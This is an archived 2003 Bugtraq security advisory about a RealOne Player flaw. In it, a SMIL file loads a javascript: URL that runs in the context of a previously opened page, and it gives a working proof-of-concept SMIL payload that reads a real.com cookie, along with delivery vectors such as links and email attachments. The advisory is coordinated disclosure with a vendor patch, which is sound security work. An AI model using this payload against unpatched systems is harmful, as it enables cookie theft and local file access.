[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    RealOne Player Allows Cross Zone and Domain Access
From:       DigitalPranksters <secteam () digitalpranksters ! com>
Date:       2003-08-27 17:44:11
[Download RAW message or body]

DigitalPranksters Security Advisory
http://www.DigitalPranksters.com

RealOne Player Allows Cross Zone and Domain Access

Risk: High

Product: RealOne Player (English only), RealOne Player v2 for Windows (all 
languages), and RealOne Enterprise Desktop (all versions, standalone and 
as configured by RealOne Desktop Manager).

Product URL: http://www.real.com/realoneplayer.html

Vendor Contacted: July 1, 2003

Vendor Released Patch: August 19, 2003

DigitalPranksters Public Advisory Released: August 27, 2003

Found by: KrazySnake (krazysnake@digitalpranksters.com) 

Problem:
Using a SMIL presentation, an attacker can instruct the RealOne player to 
load a series of URLs. If the attacker specifies a scripting protocol as 
the URL, the script executes in the context of the previous URL. This 
allows the attacker access to everything the previous URL had access to. 
For example, an attacker could load a file on the local machine (C: drive) 
through the SMIL and then load script into the "my computer" zone to read 
content from the local hard disk. It also allows the attack to script web 
sites and steal cookies. 
We feel this is a high risk because there is no prompt before opening a 
SMIL file. This allows the attacker to open the maliciously created file 
without the victim's intent. We have identified several potential attack 
vectors. These include linking to the SMIL over HTTP through link (A 
HREF="malicious.smil"), javascript (document.location="malicious.smil"), 
and email attachments. 

Proof of concept:
We have created a SMIL file that will read the cookie from 
https://order.real.com/pt/order.html. The cookie will be read 9 seconds 
after the audio has begun.

Source Code:
<smil xmlns="http://www.w3.org/2001/SMIL20/Language" 
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
 <head>
  <meta name="title" content="DigitalPranksters.com Proof of Concept"/>
  <meta name="author" content="DigitalPranksters.com"/>
  <meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
 </head>
 <body>
  <audio 
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
   <area href="https://order.real.com/pt/order.html" begin="1s" 
external="true" actuate="onLoad" sourcePlaystate="play" 
rn:sendTo="_rpcontextwin">
    <rn:param name="width" value="10"/>
    <rn:param name="height" value="10"/>
   </area>
   <area href="javascript:alert('Hi there!  I\'m a digital prankster.  I 
just read your cookie from ' + document.domain + ' over the ' + 
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + 
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad" 
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
  </audio>
 </body>
</smil> 

Resolution:
RealNetworks released a security update to address this issue. The 
security update and details of this update from RealNetworks are available 
from 
http://service.real.com/help/faq/security/securityupdate_august2003.html.

Greetings:
Harmo and HTMLBCat.
Thanks to RealNetworks for fixing this issue.

Disclaimer:
Standard disclaimer applies. The opinions expressed in this advisory are 
our own and not of any company. The information within this advisory may 
change without notice. Use of this information constitutes acceptance for 
use in an AS IS condition. There are no warranties with regard to this 
information. In no event shall the author be liable for any damages 
whatsoever arising out of or in connection with the use or spread of this 
information. Any use of this information is at the user's own risk.

[prev in list] [next in list] [prev in thread] [next in thread]